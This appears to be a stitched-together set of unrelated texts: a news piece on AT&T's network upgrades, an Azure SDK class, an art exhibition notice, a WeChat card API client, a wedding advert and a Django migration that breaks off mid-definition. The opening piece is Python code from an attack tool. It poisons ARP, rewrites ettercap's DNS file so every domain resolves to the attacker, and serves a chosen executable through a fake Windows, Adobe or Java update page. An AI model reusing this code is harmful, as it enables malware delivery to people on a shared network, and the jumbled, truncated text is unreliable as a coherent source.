self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_start.clicked.connect(self.dns_start)
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_start,0,3)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Modules/Win-Explo/Windows_Update/index.html"):
remove("Modules/Win-Explo/Windows_Update/index.html")
if path.isfile("Modules/Win-Explo/Windows_Update/windows-update.exe"):
remove("Modules/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Modules/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
except OSError,e:
print e
if not getuid() != 0:
file_html = open("Modules/Win-Explo/Settings_WinUpdate.html","r").read()
settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
if self.path_file_etter == None:
self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
if not self.path_file_etter != None:
QMessageBox.information(self, 'Path not Found', "the file etter.dns not found check if ettercap this installed")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
QMessageBox.information(self, 'Server Phishing Error', "Error not start Server...")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
def getSize(self,filename):
st = stat(filename)
return st.st_size
|
AT&T customers are seeing many more messages like this one, thanks to $20 billion spent on upgrades in the past year.
NEW YORK (CNNMoney) -- Dropped calls and spotty service, particularly for iPhone owners, made AT&T the most hated wireless carrier in America. Here's the surprise twist: widespread, under-the-radar improvements to the company's network have quietly helped AT&T move past its infamous struggles.
The nation's second-largest wireless carrier says it spent roughly $20 billion last year making 48,000 network enhancements across the country. That spending spree bought a 25% improvement in dropped-call performance on AT&T's 3G network, plus added capacity and faster speeds.
In the process, the company turned on two new networks. Though both were confusingly labeled "4G," they each offer significant improvements over AT&T's (T, Fortune 500) existing 3G network: one new network has speeds of up to four times faster than 3G, and the other brings a ten-fold improvement in speed.
Yet consumers have been slow to change their opinion of AT&T.
"Satisfaction with our network performance has gone into a neutral state," said John Stankey, CEO of AT&T Wireless, at a telecommunications conference held in San Francisco by Citigroup (C, Fortune 500) last week. "Our goal is to go from neutral to positive. We've made a lot of progress, but I don't want to suggest we're done."
A recent survey conducted by Consumer Reports ranked AT&T the worst carrier in America in terms of customer satisfaction. AT&T received the lowest possible rating on value and voice quality, and the second-lowest possible rating on data service.
That's not particularly surprising. AT&T's network woes have been very high-profile thanks to its four-year iPhone exclusivity deal with Apple (AAPL, Fortune 500). The wireless giant's struggles were blasted and mocked everywhere from the mainstream news media to late-night comedy shows.
AT&T's reputation wasn't helped by dismal satisfaction with the company's customer service, according to the Consumer Reports survey. AT&T also took a PR hit during its wildly unpopular T-Mobile takeover attempt.
Still, the mediocre perception of AT&T's network quality lags behind the much-improved reality, according to wireless industry experts.
Frost & Sullivan, an influential telecommunications industry analysis firm, awarded AT&T its 2011 strategy award for the North American mobile network market, praising the company for its dual-network improvement strategy.
AT&T is gradually rolling out its ultra-fast 4G Long Term Evolution (LTE) network, which will be the mobile network standard of the future. AT&T's LTE network now covers 74 million Americans, which is about a quarter of the company's 3G network coverage.
At the same time, AT&T is upgrading its 3G network -- which operates on the older High Speed Packet Access (HSPA) standard -- to what it calls "4G" HSPA+. The upgraded network is now available to more than 285 million Americans, AT&T Wireless CEO Stankey said last week.
Archrival Verizon (VZ, Fortune 500), by contrast, quickly rolled out its LTE network to cover 200 million Americans by the end of last year. But Verizon's 3G network is based on the Code Division Multiple Access (CDMA) standard, which is essentially maxed out in terms of speed. Sprint's (S, Fortune 500) 3G CDMA network also can't be upgraded significantly.
That's potentially a huge advantage for AT&T, since it will take several years for LTE networks to reach the vast majority of Americans the way that 3G networks do today.
"As 4G LTE networks are rolled out nationwide, AT&T's wireless network strategy will undoubtedly benefit its customers, who will have access to faster speeds, even when outside an LTE coverage area," said Peter Finalle, analyst at Frost & Sullivan.
What's more, Verizon's recent 4G struggles give AT&T an opportunity to flaunt its own rival strategy.
Though Verizon has been praised for rolling out its LTE network before any other wireless company even got started, its deployment speed was more out of necessity. It lacked the 3G upgrade option that AT&T has. Verizon is paying for that strategy now, suffering outage after outage: Verizon's 4G network totaled five nationwide outages in 2011 and four in December alone.
Will customers notice? They haven't yet. The alphabet soup -- 4G, LTE, HSPA and so on -- is confusing to most.
"AT&T advertises HSPA+ as '4G,' so the average consumer will likely not think of the carrier as not being current with latest technology," said Ari Zoldan, CEO of Quantum Networks, a next-generation network supplier. "Having HSPA+ in areas outside of LTE markets is very smart and serves a niche for the carrier, and it's still to be determined whether customers will put enough value on 'true' 4G."
AT&T's network is getting better, and it's better positioned for the long haul than any of its rivals. Now it just has to wait for perception to catch up to that reality.
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .control_activity import ControlActivity
class FilterActivity(ControlActivity):
"""Filter and return results from input array based on the conditions.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param name: Activity name.
:type name: str
:param description: Activity description.
:type description: str
:param depends_on: Activity depends on condition.
:type depends_on: list[~azure.mgmt.datafactory.models.ActivityDependency]
:param type: Constant filled by server.
:type type: str
:param items: Input array on which filter should be applied.
:type items: ~azure.mgmt.datafactory.models.Expression
:param condition: Condition to be used for filtering the input.
:type condition: ~azure.mgmt.datafactory.models.Expression
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
'items': {'required': True},
'condition': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'depends_on': {'key': 'dependsOn', 'type': '[ActivityDependency]'},
'type': {'key': 'type', 'type': 'str'},
'items': {'key': 'typeProperties.items', 'type': 'Expression'},
'condition': {'key': 'typeProperties.condition', 'type': 'Expression'},
}
def __init__(self, name, items, condition, additional_properties=None, description=None, depends_on=None):
super(FilterActivity, self).__init__(additional_properties=additional_properties, name=name, description=description, depends_on=depends_on)
self.items = items
self.condition = condition
self.type = 'Filter'
|
This month we are delighted to join forces with The Native Spirit Film Festival and the Bloomsbury festival in London. We will be exhibiting the breathtaking portraits of fine art photographer and social justice advocate Cara Romero at the Crypt Gallery. The exhibition ‘Life Blood‘, curated by Ash Kotak, explores activist art as realised by a group of international artists, film makers, writers and a poet.
‘Life Blood‘ opens on Thursday 18th 6.30-8.30 and ends on Sunday 21st October with a day of ‘Activism & Art‘ events. At 3pm I will be speaking about the work of Cara Romero, her evolution as an artist and her mission to shift perceptions of Indigenous people and cultures. Following my talk, there will be a candid discussion with a group of Native American women about the tragic situation of ‘Murdered and Missing Indigenous Women and Girls’ #MMIW.
If you are in London please come along to the Crypt Gallery between Thursday 18th and Sunday 21st October.
The Native Spirit Film Festival launches on Thursday October 11th and presents ten days of excellent International Indigenous films in venues across London.
|
# -*- coding: utf-8 -*-
from pywechat.services.basic import Basic
class CardService(Basic):
"""This class is an implement of the Wechat service of card.
All request's urls come from the official documents.
Link: https://mp.weixin.qq.com/wiki/home/index.html
"""
def upload_image(self, image):
"""Uploads the image for the logo of card.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Args:
image: the file of image. open(image_name, 'rb')
Returns:
the json data.Example:
{"url":"http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkm/0"}
Raises:
WechatError: to raise the exception if it contains the error.
"""
url = 'https://api.weixin.qq.com/cgi-bin/media/uploadimg'
files = {'buffer': image}
json_data = self._send_request('post', url, files=files)
return json_data
def get_colors(self):
"""Gets the available colors of cards.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"colors":[
{"name":"Color010","value":"#55bd47"},
{"name":"Color020","value":"#10ad61"},
{"name":"Color030","value":"#35a4de"},
{"name":"Color040","value":"#3d78da"},
{"name":"Color050","value":"#9058cb"},
{"name":"Color060","value":"#de9c33"},
{"name":"Color070","value":"#ebac16"},
{"name":"Color080","value":"#f9861f"},
{"name":"Color081","value":"#f08500"},
{"name":"Color090","value":"#e75735"},
{"name":"Color100","value":"#d54036"},
{"name":"Color101","value":"#cf3e36"}
]
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
url = 'https://api.weixin.qq.com/card/getcolors'
json_data = self._send_request('get', url)
return json_data
def create_card(
self, card_dict, card_type, date_info,
logo_url, code_type, brand_name, title,
color, notice, description, quantity,
**infos):
"""Creates a card.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Returns:
the json data.Example:
{
"card": {
"card_type": "GROUPON",
"groupon": {
"base_info": {
"logo_url": "http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRK/0",
"brand_name":"海底捞",
"code_type":"CODE_TYPE_TEXT",
"title": "132元双人火锅套餐",
"sub_title": "周末狂欢必备",
"color": "Color010",
"notice": "使用时向服务员出示此券",
"service_phone": "020-88888888",
"description": "不可与其他优惠同享\n如需团购券发票,请在消费时向商户提出\n店内均可使用,仅限堂食",
"date_info": {
"type": 1,
"begin_timestamp": 1397577600,
"end_timestamp": 1422724261
},
"sku": {
"quantity": 50000000
},
"get_limit": 3,
"use_custom_code": false,
"bind_openid": false,
"can_share": true,
"can_give_friend": true,
"location_id_list": [123, 12321, 345345],
"custom_url_name": "立即使用",
"custom_url": "http://www.qq.com",
"custom_url_sub_title": "6个汉字tips",
"promotion_url_name": "更多优惠",
"promotion_url": "http://www.qq.com",
"source": "大众点评"
},
"deal_detail": "以下锅底2选1(有菌王锅、麻辣锅、大骨锅、番茄锅、清补凉锅、酸菜鱼锅可选):\n大锅1份
12元\n小锅2份16元"}
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
base_info = {
"logo_url": logo_url,
"brand_name": brand_name,
"title": title,
"code_type": code_type,
"color": color,
"notice": notice,
"description": description,
"sku": {
"quantity": quantity
},
"date_info": date_info
}
base_info.update(infos)
data = {
"card": {
"card_type": card_type.upper(),
card_type.lower(): {
"base_info": base_info
}
}
}
data["card"][card_type].update(card_dict)
url = 'https://api.weixin.qq.com/card/create'
json_data = self._send_request('post', url, data=data)
return json_data
def create_qrcode(self, code, **infos):
"""Creates a qr code.
(Link:
https://mp.weixin.qq.com/wiki/12/ccd3aa0bddfe5211aace864de00b42e0.html)
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"ticket":"gQG28DoAAAAAAAAAASxodHRwOi8vd2VpeGluLnFxLmN=="
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
card_dict = {
"code": code
}
card_dict.update(infos)
data = {
"action_name": "QR_CARD",
"action_info": {
"card": {
card_dict
}
}
}
url = 'https://api.weixin.qq.com/card/qrcode/create'
json_data = self._send_request('post', url, data=data)
return json_data
def unavailable_code(self, code, card_id=None):
"""Sets the code is unavailable.
Link:
https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/unavailable'
json_data = self._send_request('post', url, data=data)
return json_data
def decrypt_code(self, encrypt_code):
"""Decrypts the code.
Link:
https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"encrypt_code": encrypt_code
}
url = 'https://api.weixin.qq.com/card/code/decrtpt'
json_data = self._send_request('post', url, data=data)
return json_data
def get_code(self, code, card_id=None):
"""Get the code.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA",
"card":{
"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc",
"begin_time": 1404205036,
"end_time": 1404205036,
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/get'
json_data = self._send_request('post', url, data=data)
return json_data
def get_card(self, card_id):
"""Get the card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"card": {
"card_type": "GROUPON",
"groupon": {
"base_info": {
"logo_url": "http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkmG8x/0",
"brand_name":"海底捞",
"code_type":"CODE_TYPE_TEXT",
"title": "132元双人火锅套餐",
"sub_title": "周末狂欢必备",
"color": "Color010",
"notice": "使用时向服务员出示此券",
"service_phone": "020-88888888",
"description": "不可与其他优惠同享\n如需团购券发票,请在消费时向商户提出\n店内均可使用,仅限堂食",
"date_info": {
"type": 1,
"begin_timestamp": 1397577600,
"end_timestamp": 1422724261
},
"sku": {
"quantity": 50000000
},
"get_limit": 3,
"use_custom_code": false,
"bind_openid": false,
"can_share": true,
"can_give_friend": true,
"location_id_list": [123, 12321, 345345],
"custom_url_name": "立即使用",
"custom_url": "http://www.qq.com",
"custom_url_sub_title": "6个汉字tips",
"promotion_url_name": "更多优惠",
"promotion_url": "http://www.qq.com",
"source": "大众点评"
},
"deal_detail": "以下锅底2选1(有菌王锅、麻辣锅、大骨锅、番茄锅、清补凉锅、酸菜鱼锅可选):\n大锅1份
12元\n小锅2份16元"}
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id
}
url = 'https://api.weixin.qq.com/card/get'
json_data = self._send_request('post', url, data=data)
return json_data
def batchget_card(self, offset, count):
"""Get a list of cards.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok",
"card_id_list":["ph_gmt7cUVrlRk8swPwx7aDyF-pg"],
"total_num":1
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"offset": offset,
"count": count
}
url = 'https://api.weixin.qq.com/card/batchget'
json_data = self._send_request('post', url, data=data)
return json_data
def update_card(
self, card_id, card_type,
logo_url, notice, description, color, detail=None,
bonus_cleared=None, bonus_rules=None, balance_rules=None, prerogative=None,
**infos):
"""Updates a card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
base_info = {
"logo_url": logo_url,
"notice": notice,
"description": description,
"color": color,
"detail": detail
}
base_info.update(infos)
data = {
"card_id": card_id,
card_type.lower(): {
"base_info": base_info,
"bonus_cleared": bonus_cleared,
"bonus_rules": bonus_rules,
"balance_rules": balance_rules,
"prerogative": prerogative
}
}
url = 'https://api.weixin.qq.com/card/update'
json_data = self._send_request('post', url, data=data)
return json_data
def modify_stock(
self, card_id,
increase_stock_value=None,
reduce_stock_value=None):
"""Modifies the stock of a card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id,
}
if increase_stock_value:
data["increase_stock_value"] = increase_stock_value
if reduce_stock_value:
data["reduce_stock_value"] = reduce_stock_value
url = 'https://api.weixin.qq.com/card/modifystock'
json_data = self._send_request('post', url, data=data)
return json_data
def update_code(self, code, new_code, card_id=None):
"""Updates the code.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code,
"new_code": new_code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/update'
json_data = self._send_request('post', url, data=data)
return json_data
def delete_card(self, card_id):
"""Deletes the card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
the json data.Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id
}
url = 'https://api.weixin.qq.com/card/delete'
json_data = self._send_request('post', url, data=data)
return json_data
|
Description We provide the perfect blend of the best event and wedding entertainment in Manchester and Cheshire that the industry has to offer.
With a mixture of incredible acts across a variety of genres and styles, this small but perfectly formed selection of event and wedding entertainment will make sure you need look no further, we’ve got you covered!
Get your wedding entertainment inspiration from Entertainment Nation! Entertainment Nation is the UK's most exciting wedding entertainment agency with a roster overflowing with the best wedding bands, musicians, DJs and entertainers.
|
from south.db import db
from django.db import models
from localtv.models import *
class Migration:
def forwards(self, orm):
# Dropping ManyToManyField 'Feed.auto_authors'
db.delete_table('localtv_feed_auto_authors')
# Dropping ManyToManyField 'Video.authors'
db.delete_table('localtv_video_authors')
# Deleting model 'author'
db.delete_table('localtv_author')
def backwards(self, orm):
# Adding ManyToManyField 'Feed.auto_authors'
db.create_table('localtv_feed_auto_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('feed', models.ForeignKey(orm.Feed, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding ManyToManyField 'Video.authors'
db.create_table('localtv_video_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('video', models.ForeignKey(orm.Video, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding model 'author'
db.create_table('localtv_author', (
('site', orm['localtv.author:site']),
('logo', orm['localtv.author:logo']),
('id', orm['localtv.author:id']),
('name', orm['localtv.author:name']),
))
db.send_create_signal('localtv', ['author'])
models = {
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.savedsearch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'when_created': ('django.db.models.fields.DateTimeField', [], {})
},
'localtv.video': {
'authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'embed_code': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']", 'null': 'True', 'blank': 'True'}),
'file_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'file_url_length': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'file_url_mimetype': ('django.db.models.fields.CharField', [], {'max_length': '60', 'blank': 'True'}),
'flash_enclosure_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_featured': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']", 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Tag']", 'blank': 'True'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video_service_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'video_service_user': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_approved': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997982)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997849)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'localtv.sitelocation': {
'about_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'admins_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'background': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'css': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'display_submit_button': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'footer_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'frontpage_style': ('django.db.models.fields.CharField', [], {'default': "'list'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'sidebar_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'submission_requires_login': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
'localtv.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'localtv.watch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Video']"})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.category': {
'Meta': {'unique_together': "(('slug', 'site'), ('name', 'site'))"},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
